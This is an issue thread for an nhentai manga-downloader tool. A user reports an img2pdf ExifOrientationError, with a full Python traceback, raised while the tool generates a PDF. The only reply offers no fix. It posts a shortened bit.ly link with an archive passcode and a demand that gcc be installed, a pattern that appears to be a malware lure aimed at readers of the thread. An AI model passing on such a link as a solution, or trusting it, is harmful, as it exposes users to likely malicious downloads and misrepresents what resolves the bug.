### ISSUE TITLE
Invalid Rotation

### ISSUE THREAD

**Issue by GreenTea-4u** [RicterZ/nhentai#331]
I've tried check the doujin if there where any odd rotated pages but there weren't any, this error came from when trying to download 391785. I ended up using imagemagick on the folder with the images to create the pdf but I would like to prevent this from happening to other doujins in the future.

Traceback (most recent call last):
  File "\\?\C:\Program Files\Python312\Scripts\nhentai-script.py", line 33, in <module>
    sys.exit(load_entry_point('nhentai==0.5.5', 'console_scripts', 'nhentai')())
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Program Files\Python312\Lib\site-packages\nhentai-0.5.5-py3.12.egg\nhentai\command.py", line 105, in main
    generate_pdf(options.output_dir, doujinshi, options.rm_origin_dir, options.move_to_folder)
  File "C:\Program Files\Python312\Lib\site-packages\nhentai-0.5.5-py3.12.egg\nhentai\utils.py", line 228, in generate_pdf
    pdf_f.write(img2pdf.convert(full_path_list))
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Program Files\Python312\Lib\site-packages\img2pdf.py", line 2733, in convert
    ) in read_images(
         ^^^^^^^^^^^^
  File "C:\Program Files\Python312\Lib\site-packages\img2pdf.py", line 1859, in read_images
    color, ndpi, imgwidthpx, imgheightpx, rotation, iccp = get_imgmetadata(
                                                           ^^^^^^^^^^^^^^^^
  File "C:\Program Files\Python312\Lib\site-packages\img2pdf.py", line 1406, in get_imgmetadata
    raise ExifOrientationError(
img2pdf.ExifOrientationError: Invalid rotation (0): use --rotation=ifvalid or rotation=img2pdf.Rotation.ifvalid to ignore

**Comment by yuncheng2024** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed
